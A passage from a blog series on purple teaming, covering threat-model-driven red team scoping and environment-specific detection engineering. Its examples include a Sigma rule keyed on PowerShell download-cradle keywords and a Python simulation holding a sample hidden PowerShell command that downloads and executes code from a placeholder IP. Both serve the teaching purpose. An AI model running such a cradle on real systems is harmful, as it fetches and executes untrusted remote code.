When red team fails: "We were detected at the lateral movement phase."

Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack.

Weekly threat hunting sessions:

  • "Given our threat model, what would the initial access look like?"
  • "What can we detect in the first 30 minutes?"
  • "Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team tests, but scoped to your paths.

Update detection rules based on what red team teaches them about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync:

  • What did red team learn about evasion?
  • What did blue team learn about detection?
  • Did our threat model change? (New threat intel, new attacks in the wild?)
  • How did we do against a realistic attack? Detected faster than last month? Detected at more stages of the path?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need:

Time allocation:

  • Red team: 20% of their week to collaborative exercises (not 100% red ops)
  • Blue team: 5–10% of SOC time to active hunting (not just passive monitoring)
  • Leadership: Time for monthly sync and iteration

Metrics (not vanity metrics):

  • Mean time to detect (for the threat model you care about)
  • Mean time to respond
  • Techniques red team is using that blue team isn't catching
  • Detection improvements month-over-month
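As a sketch of how the first two metrics might be computed from exercise records: the `RUNS` log, its keys, and the timestamps below are invented for illustration. Note the assumption that undetected runs are excluded from the mean and counted separately, since folding them in would hide the misses.

```python
from datetime import datetime
from statistics import mean

# Hypothetical exercise log: when red team acted, when blue team detected it,
# and when the response was completed. None means it never happened.
RUNS = [
    {"executed": datetime(2026, 3, 2, 9, 0), "detected": datetime(2026, 3, 2, 9, 40),
     "responded": datetime(2026, 3, 2, 11, 0)},
    {"executed": datetime(2026, 3, 9, 10, 0), "detected": datetime(2026, 3, 9, 10, 20),
     "responded": datetime(2026, 3, 9, 10, 50)},
    {"executed": datetime(2026, 3, 16, 10, 0), "detected": None, "responded": None},
]


def mean_minutes(runs, start_key, end_key):
    """Mean gap in minutes between two timestamps, skipping runs missing either one."""
    gaps = [(r[end_key] - r[start_key]).total_seconds() / 60
            for r in runs if r[start_key] and r[end_key]]
    return mean(gaps) if gaps else None


mttd = mean_minutes(RUNS, "executed", "detected")    # mean time to detect
mttr = mean_minutes(RUNS, "detected", "responded")   # mean time to respond
missed = sum(1 for r in RUNS if r["detected"] is None)
print(mttd, mttr, missed)  # 30.0 55.0 1
```

Tracking `missed` alongside the means keeps the third metric (techniques blue team isn't catching) visible month to month.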

Escalation path: If red team finds something critical (a real vulnerability, not just "technique works"), what happens? It shouldn't sit unaddressed until the quarterly debrief.

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist.

You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll go through the motions and get the theatre. You won't get the results.

But if you do this right, you get something real:

  • Red team that understands why they're testing what they're testing
  • Blue team that detects threats faster
  • Security operations that improve month-over-month
  • Collaborative culture instead of siloed teams

Checklist: Do You Have a Real Purple Team Programme?

  • [ ] Shared, documented threat model (written, agreed by red + blue + leadership)
  • [ ] Realistic attack paths (not "test everything," but specific sequences)
  • [ ] Red team constrained to threat model (not unlimited scope)
  • [ ] Blue team actively hunting (not passively monitoring)
  • [ ] Monthly sync between teams (with iteration, not just reporting)
  • [ ] Detection improving month-over-month (measurable)
  • [ ] Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.


Further Reading:

  • Practical Purple Teaming (Alfie Champion): The operational playbook
  • VECTR: Platform for tracking red and blue team testing activity and measuring detection coverage
  • Active Defense: Threat modelling for defence

Question: Do you have a documented threat model that both red and blue teams agree on? Start there.


Next week: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.

Purple Teaming

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran 20 March 2026 5 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

  1. Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
  2. Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
  3. Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment:

  • Windows 10/11 workstations, hardened build
  • Modern domain controllers with Kerberos hardening
  • Network segmentation: finance backend on isolated VLAN, can't reach from general corp network
  • EDR deployed globally
  • No plaintext credentials stored on endpoints
  • Conditional Access enforces multi-factor authentication
  • Sensitive data is encrypted at rest

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Encrypted data stays encrypted. Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic. We need better encryption key logging."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

  • Use living-off-the-land techniques (no Mimikatz)
  • Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
  • Harvest credentials quietly over time, not via noisy one-shot credential dumping
  • Exfil via HTTP/HTTPS, not SMB or DNS tunneling (you'd flag those)

So it's fine that your EDR raised no alerts on the red team's checklist techniques: they are not your risk. Your tools should be judged against your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

  1. You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not: you're watching simulations that would never work in the real world.
  2. You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you. That time could go to hunting for actual threats or hardening critical systems.
  3. You create alert fatigue. All those detection rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't adequately monitor.
  4. You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the latest SIEM module, the newest EDR feature, the fancy threat hunting platform. None of which you needed if your testing was threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model.

Ask yourself:

  • Who targets companies like mine? (Organized crime, state-sponsored, activists, insiders?)
  • What are they after? (Financial data, IP, customer PII, operational disruption?)
  • What access do they typically start with? (Phishing, supply chain, credential stuffing, insider?)
  • What's their environment awareness? (Will they know about my network segmentation? My EDR?)

Write this down. Three paragraphs, maximum. "Our primary threat is FIN7. They target financial services via spear-phishing to get initial access to non-critical systems. They spend weeks moving laterally to reach our payment processing tier."

Step 2: Map your environment against that threat.

  • What attack paths does your threat model realistically have access to?
  • Where can they move? (Based on segmentation, not assumption.)
  • What techniques are actually possible? (Not "Mimikatz might work" but "does it work here?")
  • What detection gaps exist on those paths?
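The "where can they move?" question is essentially a reachability check over the flows your firewall rules actually allow. Here is a minimal sketch using breadth-first search. The segment names and the `ALLOWED_FLOWS` map are made up for illustration, including the jump host, which is an assumption rather than part of the example environment.

```python
from collections import deque

# Hypothetical allowed flows (source segment -> reachable segments), taken from
# firewall rules rather than from assumptions about the network.
ALLOWED_FLOWS = {
    "corp_workstations": ["file_server", "jump_host"],
    "jump_host": ["finance_backend"],
    "marketing": ["file_server"],
    "file_server": [],
    "finance_backend": [],
}


def shortest_path(start, target):
    """Breadth-first search for the shortest allowed path; None if unreachable."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in ALLOWED_FLOWS.get(path[-1], []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


print(shortest_path("corp_workstations", "finance_backend"))
# ['corp_workstations', 'jump_host', 'finance_backend']
print(shortest_path("marketing", "finance_backend"))  # None
```

Every hop on a returned path is a place where a detection point is worth having. A `None` result is segmentation doing its job.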

Step 3: Test only the relevant paths.

Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing + living-off-the-land lateral movement, test that.

If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations.

If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.
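For the HTTPS case, "anomalous" has to be defined against each workstation's own history. A rough sketch follows, assuming you already collect daily outbound HTTPS volume per host. The function name, the three-sigma threshold, and the sample numbers are all illustrative choices, not recommended values.

```python
from statistics import mean, stdev


def is_anomalous(history_mb, today_mb, sigmas=3.0):
    """Flag today's outbound volume if it exceeds mean + sigmas * stdev of the host's history.

    Needs at least two historical data points, because stdev is undefined for one.
    """
    threshold = mean(history_mb) + sigmas * stdev(history_mb)
    return today_mb > threshold


# Hypothetical daily outbound HTTPS volume (MB) for one workstation.
baseline = [120, 135, 110, 128, 140, 125, 118]

print(is_anomalous(baseline, 150))  # False: within normal variation
print(is_anomalous(baseline, 900))  # True: worth a look
```

A per-host threshold like this is crude, and an attacker who exfiltrates slowly will stay under it, which is exactly the kind of evasion the red team should try.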

The Honest Conversation

Here's what I'd tell your security team:

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure—that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us, and build detection for those attack paths."

This conversation is uncomfortable because it implies your purple team programme might be theatre. But it's the one that matters.

What's Next

For your next purple team exercise:

  1. Spend time defining threat model, not technique selection
  2. Have blue team validate which attack paths are realistic in your environment
  3. Red team tests those paths, trying to evade detection on actual adversary techniques
  4. Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat.

That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.


Further Reading:

  • MITRE ATT&CK: A framework, not a testing roadmap
  • Threat modeling: Microsoft's threat modeling guide
  • Practical Purple Teaming (Alfie Champion): Methodology for real collaboration

Have a counter-argument? Reply in the Discord community—let's debate threat modelling.


Next week: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps we found in a financial services engagement.

Purple Teaming

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran 27 March 2026 6 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

Let's look at a real example. This is a common Sigma rule (simplified):


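title: Suspicious PowerShell Execution
logsource:
  product: windows
  service: security  # Event 4688 only carries a command line if command-line auditing is enabled
detection:
  selection:
    EventID: 4688
    NewProcessName|endswith: '\powershell.exe'  # restrict to PowerShell, as the title implies
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection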

This rule fires when PowerShell runs with suspicious keywords on its command line. Seems solid. Catches download-and-execute cradles, right?

Now let's deploy it in a real environment:

  1. Your software deployment tool (SCCM, Ansible, whatever) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
  2. Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
  3. Your developers' script names and arguments contain the substring "iex". Sigma string matching is case-insensitive by default, so any command line with those three letters in it fires. Noise.
  4. Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. The SIEM alerts on things the EDR already allowed.

By week two, detection engineers have excluded so many cases that half the rule is effectively disabled. By month one, it's gone. And when an attacker actually uses a PowerShell download cradle, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.
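To see the problem concretely, here is a small simulation of the rule's keyword match against a handful of command lines. The sample command lines, hostnames, and labels are invented for illustration. The only behaviour borrowed from Sigma is that `contains` matching is case-insensitive by default.

```python
KEYWORDS = ("iex", "invoke-expression", "downloadstring")


def rule_fires(command_line: str) -> bool:
    # Mirror Sigma's default case-insensitive `contains` match.
    lowered = command_line.lower()
    return any(keyword in lowered for keyword in KEYWORDS)


# (source, command line, is_malicious) -- all hypothetical examples.
SAMPLES = [
    ("deployment tool",
     "powershell.exe -Command (New-Object Net.WebClient).DownloadString('https://deploy.example.internal/agent.ps1')",
     False),
    ("backup job",
     "powershell.exe -Command Invoke-Expression $env:BACKUP_JOB",
     False),
    ("attacker",
     "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')",
     True),
]

hits = [(source, malicious) for source, cmd, malicious in SAMPLES if rule_fires(cmd)]
false_positives = sum(1 for _source, malicious in hits if not malicious)
print(f"{len(hits)} alerts, {false_positives} false positives")  # 3 alerts, 2 false positives
```

The match logic is correct in all three cases. What it lacks is any knowledge of which of those sources are expected in this particular environment.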

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume:

  • No legitimate tools use the same technique
  • All environments have the same baseline behaviour
  • Detection can be tuned to pure signal (no noise)
  • Attackers use the same techniques in every environment

All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks. But it'll also alert on 10,000 false positives. The choice is: tune aggressively (miss attacks) or accept noise (burn out analysts). There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.

The Real Problem With Sigma (and YARA, and Generic Rules)

Don't get me wrong—Sigma is excellent. Open-source, community-driven, better than nothing.

But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either:

  • Blindly tuned rules — so permissive they're useless
  • Overly aggressive rules — so noisy they're turned off within a week
  • Rules that don't apply — designed for environments completely different from yours

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline.

Run your legitimate tools and systems for a week. Capture:

  • Normal PowerShell execution patterns (what commands, how often, from which systems)
  • Normal network connections (which systems talk to which, ports, protocols)
  • Normal process relationships (which processes spawn which children)
  • Normal file writes (where legitimate software writes, when, how often)

Write this down. This is your noise floor. Activity that matches it is expected; activity that deviates from it deserves a look.
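As one illustration of a captured baseline, take process relationships: record every parent and child pair seen during the baseline week, then surface pairs that were never observed. The event shape and process names below are assumptions. Real telemetry would come from your EDR or process-creation logs.

```python
from collections import Counter


def build_baseline(events):
    """Count every (parent, child) process pair seen during the baseline window."""
    return Counter((e["parent"], e["child"]) for e in events)


def unseen_pairs(baseline, new_events):
    """Return (parent, child) pairs from new events that never appeared in the baseline."""
    return [(e["parent"], e["child"]) for e in new_events
            if (e["parent"], e["child"]) not in baseline]


# Hypothetical baseline week and a later batch of events.
week = [
    {"parent": "explorer.exe", "child": "outlook.exe"},
    {"parent": "services.exe", "child": "svchost.exe"},
    {"parent": "explorer.exe", "child": "outlook.exe"},
]
today = [
    {"parent": "outlook.exe", "child": "powershell.exe"},
    {"parent": "services.exe", "child": "svchost.exe"},
]

print(unseen_pairs(build_baseline(week), today))  # [('outlook.exe', 'powershell.exe')]
```

The counts in the baseline are kept deliberately: a pair seen once in a week is a weaker signal of "normal" than a pair seen ten thousand times.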

Then build detection for your actual threats.

Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools. Insiders would access your sensitive data paths.

Build rules for those specific paths, in your specific environment, against your specific baseline.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts.

Anything else? Alert immediately. False positives should be rare, because the rule encodes a baseline you know.
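That database example translates almost directly into code. In this sketch the host names and service account names are placeholders, and treating "2 PM on Mondays" as the whole 14:00 hour is an assumption you would adjust to the batch job's real duration.

```python
from datetime import datetime

# Hypothetical allowlists: the 3 systems and 2 service accounts from the baseline.
ALLOWED_HOSTS = {"batch-01", "batch-02", "dba-jump"}
ALLOWED_ACCOUNTS = {"svc_batch", "svc_recon"}


def should_alert(host: str, account: str, when: datetime) -> bool:
    """Alert on any admin access that is not the known Monday 14:00 batch pattern."""
    in_window = when.weekday() == 0 and when.hour == 14  # Monday, 14:00-14:59
    expected = host in ALLOWED_HOSTS and account in ALLOWED_ACCOUNTS and in_window
    return not expected


print(should_alert("batch-01", "svc_batch", datetime(2026, 4, 6, 14, 5)))   # False: the batch job
print(should_alert("batch-01", "svc_batch", datetime(2026, 4, 7, 14, 5)))   # True: wrong day
print(should_alert("ws-0421", "svc_batch", datetime(2026, 4, 6, 14, 5)))    # True: wrong host
```

The rule is short because the baseline did the work. Without the documented hosts, accounts, and schedule there would be nothing to compare against.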

Tune for precision, not coverage.

Don't try to detect every possible attack technique. Detect the ones that matter to you. Quality over quantity.

Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point—a hypothesis library.

Use them like this:

  1. Review — Which techniques are relevant to my threat model?
  2. Understand — What is this rule trying to catch? How does it work?
  3. Evaluate — Would this actually detect an attack in my environment, or would it be lost in noise?
  4. Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
  5. Test — Run it against historical data. Does it catch what you expect? How many false positives?
  6. Deploy — Only if it's precise enough that you'll still be maintaining it, not muting it, a month from now.

This takes time. It's not as fast as importing 800 rules. But it works.
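The "Test" step can be as simple as replaying a candidate rule over labelled historical events and counting what it gets right and wrong. The sketch below assumes you have such labels. The event fields, the `adapted_rule` logic, and the four sample events are hypothetical.

```python
def evaluate(rule, events):
    """Replay a rule over labelled events and report precision and recall."""
    tp = sum(1 for e in events if rule(e) and e["malicious"])
    fp = sum(1 for e in events if rule(e) and not e["malicious"])
    fn = sum(1 for e in events if not rule(e) and e["malicious"])
    return {
        "true_positives": tp,
        "false_positives": fp,
        "missed": fn,
        "precision": tp / (tp + fp) if tp + fp else None,
        "recall": tp / (tp + fn) if tp + fn else None,
    }


def adapted_rule(event):
    # Adapted for this environment: ignore the known deployment hosts.
    return "downloadstring" in event["cmd"].lower() and event["host_role"] != "deployment"


HISTORY = [
    {"host_role": "deployment", "cmd": "powershell DownloadString(...)", "malicious": False},
    {"host_role": "workstation", "cmd": "powershell IEX DownloadString(...)", "malicious": True},
    {"host_role": "workstation", "cmd": "powershell DownloadString(...)", "malicious": False},
    {"host_role": "workstation", "cmd": "rundll32 payload.dll,Run", "malicious": True},
]

result = evaluate(adapted_rule, HISTORY)
print(result["precision"], result["recall"])  # 0.5 0.5
```

Numbers like these make the deploy decision a discussion about evidence: is one false positive per true positive tolerable for this path, and what would catch the event the rule missed?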

The Uncomfortable Truth

If your detection programme consists of:

  • Rules from the internet
  • Sigma rules you didn't adapt
  • Detection thresholds you didn't tune
  • Coverage of every MITRE ATT&CK technique

...then you have a detection programme in name only. In practice, you're hoping someone else's rules work in your environment. They usually don't.

The uncomfortable part: Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands:

  • Your systems (what's normal)
  • Your threats (what's dangerous)
  • Your tools (what they can actually detect)

That person is on your team. Or you don't have effective detection.

What's Next

For your detection programme:

  1. Audit your rules. How many do you actually tune and maintain? Delete the rest.
  2. Establish your baseline. Document normal behaviour for critical systems and techniques.
  3. Build environment-specific rules for your threat model. Don't import; adapt.
  4. Focus on precision. Ten good rules beat 1000 mediocre rules.
  5. Invest in the people who know your environment. That's where effective detection lives.

Further Reading:

  • Detection Engineering and Threat Hunting (Marcus Hutchins): Real-world detection work
  • Security Data Science (Andrew Pendergast): Baselining and anomaly detection
  • Florian Roth's Sigma rules: Study how they work; understand why you'll need to adapt them

Question: How many detection rules do you maintain? How many are turned off? We should talk about that.


Next week: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.

Purple Teaming

Why Your Red Team Tests Are Designed to Fail, And You Don't Know It

Hugh McGauran 3 April 2026 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter.

Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement.

Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope:

  • Initial access (phishing, watering hole, supply chain)
  • Lateral movement (everything on the network)
  • Persistence (any means necessary)
  • Exfiltration (any data, any method)

This sounds comprehensive. It sounds realistic. It's actually a fantasy.

Reality: An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." They have:

  • Initial access: Maybe phishing works. Maybe it doesn't. They don't get to pivot to every possible next step.
  • Lateral movement: They can move within the compromised subnet and maybe one adjacent network. Hard segmentation blocks them beyond that.
  • Persistence: Certain accounts and systems work; others have additional logging and monitoring.
  • Exfiltration: They can exfil data, but they're constrained by network egress points and monitoring.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment—they're fighting an idealized version of it.

The Environment Problem

Here's where it gets messy.

Red team asks: "What systems can we access?"

Blue team (or the client) says: "Whatever an attacker could realistically access."

This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

The answer is usually much smaller. A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway.

Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.
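A debrief can make this distinction explicit by checking each finding against the systems the threat model says an attacker would realistically reach. A minimal sketch, where the function name, the labels, and the example system names are all assumptions:

```python
def classify_finding(system, detected, realistic_targets):
    """Separate scope problems from genuine detection gaps."""
    if system not in realistic_targets:
        return "scope issue"       # the adversary would not realistically be here
    return "detected" if detected else "detection gap"


# Hypothetical systems an attacker after insurance data would actually reach.
REALISTIC_TARGETS = {"claims-db", "policy-file-server", "claims-app"}

print(classify_finding("marketing-fs", False, REALISTIC_TARGETS))  # scope issue
print(classify_finding("claims-db", False, REALISTIC_TARGETS))     # detection gap
print(classify_finding("claims-app", True, REALISTIC_TARGETS))     # detected
```

Only the "detection gap" findings belong on the detection engineering backlog. The "scope issue" findings belong in the next scoping conversation.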

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

  • Kerberos relay attacks (require network conditions that don't exist here)
  • Memory-only persistence (assumes no EDR; EDR is deployed)
  • Named pipe lateral movement (works in the test, but in production the pipes are monitored)
  • PowerShell obfuscation (the client's logging would detect it; that logging just wasn't in play during the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

Blue team thinks detection failed. Really, detection is fine—the technique just wasn't realistic.

The Time Problem

Red team has unlimited time to find a path. An attacker has limited time before they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked/detected on the third, leaves (or adapts).

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds.

The persistence and thoroughness of a week-long engagement are not representative of the time pressure and detection risk of a real intrusion.

But nobody talks about this in the debrief. Red team just marks it as "successful lateral movement."

What This Means

Your red team engagement tells you:

"Over an extended period, using known techniques, with no time pressure, against systems and networks we can freely access and test, we were able to move laterally and exfiltrate data."

What it doesn't tell you:

"Against your actual threat model, in real time, with your actual monitoring and detection in place, this is what would happen."

Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

  1. Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
  2. Time-limited and detection-aware. Red team doesn't have unlimited time to brute-force techniques. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
  3. Constrained to realistic access. Red team starts from the actual initial access vector (phishing, supply chain, etc.), not from "we've already compromised a workstation." They work with the access they actually get.
  4. Detection evasion is the goal, not secondary. Red team doesn't just run commands; they try to run them in ways that avoid detection. If it's immediately flagged, it fails, whether or not the technique "works."
  5. Realistic tool constraints. Red team uses tools an attacker would actually use, not just "what works in this test." If they'd use living-off-the-land, they do. If they'd avoid Mimikatz because EDR would catch it, they do.
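The first two constraints are easy to write into the rules of engagement as something checkable. The sketch below is one possible shape, not a standard: the `EngagementScope` class, the system names, and the start time are illustrative. Only the 48-hour window comes from the list above.

```python
from datetime import datetime, timedelta


class EngagementScope:
    """Threat-model-driven scope with a hard time limit (all names illustrative)."""

    def __init__(self, in_scope, start, window_hours=48):
        self.in_scope = set(in_scope)
        self.start = start
        self.end = start + timedelta(hours=window_hours)

    def allows(self, system, at):
        # An action is valid only against an in-scope system, inside the window.
        return system in self.in_scope and self.start <= at < self.end


scope = EngagementScope(
    in_scope={"claims-db", "claims-app", "policy-file-server"},
    start=datetime(2026, 4, 13, 9, 0),
)

print(scope.allows("claims-db", datetime(2026, 4, 14, 16, 0)))     # True
print(scope.allows("hvac-mgmt", datetime(2026, 4, 14, 16, 0)))     # False: not in the threat model
print(scope.allows("claims-db", datetime(2026, 4, 15, 9, 0)))      # False: window has closed
```

Logging every red team action through a check like this gives the debrief a clean record of what was tested inside the agreed constraints and what was not.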

The Uncomfortable Conversation

Here's what I'd tell a client:

"Your last red team engagement tested whether advanced techniques are possible in your environment, not whether they'd succeed in a real attack. The findings are less meaningful than you think. Let's reframe the next engagement around your actual threat model and realistic constraints."

This is hard because:

  • Red team has to work harder
  • Results are less "impressive" (maybe red team fails certain objectives)
  • It requires more collaboration between red and blue teams
  • It can't be outsourced to a generic red team vendor

But it's honest.

A Simple Test

Ask yourself:

  • Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
  • Would your actual threat actor have access to every system red team tested?
  • Did red team have to evade detection, or was it just running commands and seeing what worked?
  • Were there time or detection constraints that matched a real attack, or was it an extended, uninterrupted testing window?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.


Further Reading:

  • NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment): How to scope and run engagements properly
  • Adversary emulation vs. penetration testing: The difference matters
  • Detection-driven red teaming: A better framework

Reality check: When was your last red team engagement? What did it actually prove?


Next week: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.

Previous
← Detection Engineering in a Real Environment: Why Generic Rules Fail
← All essays
Purple Teaming

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran 10 April 2026 6 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved."

It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward. Red team did things blue team thinks are wrong. Blue team didn't detect things they think they should have.

Month 4: Nothing changes. Red team goes back to thinking about attacks. Blue team goes back to reactive defense.

Month 5: "Why aren't we purple teaming anymore?" Meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's:

Continuous, aligned, threat-model-driven collaboration between attack and defense.

That's different from:

  • Red teaming (I attack; you detect what I did)
  • Blue teaming (I defend; hope you don't break my things)
  • Penetration testing (Contract engagement with findings)
  • Security auditing (Compliance check)

Purple teaming means:

  • Red team understands blue team's detection capabilities and constraints
  • Blue team understands attack sequences and threat actor patterns
  • Both teams align on what matters (threat model)
  • Both teams iterate continuously to improve both attack and defense
  • Collaboration is built into operations, not scheduled quarterly

The Framework

Here's how to actually build it:

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality.

Questions to answer together:

  • Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
  • What do they want? (Data, disruption, espionage, financial gain)
  • How do they typically access our environment? (Phishing, supply chain, stolen creds, physical access)
  • What paths exist from initial access to objective? (Not "any path"—realistic paths given our segmentation and security controls)
  • How much time do they have? (Minutes? Hours? Days?)
  • What detection would burn them? (At what point does our environment go "we're under attack"?)

Document this. Literally write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2-4 hours. They exfil via HTTPS to infrastructure we can't block."

This is not a consultant document. This is the shared foundation.

2. Map Realistic Attack Paths (Week 2–3)

Now, given that threat model, what are the actual attack paths?

Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them:


Initial Access (phishing email)
    ↓
User clicks, code executes (PowerShell, Word macro, whatever)
    ↓
Reverse shell / beaconing established
    ↓
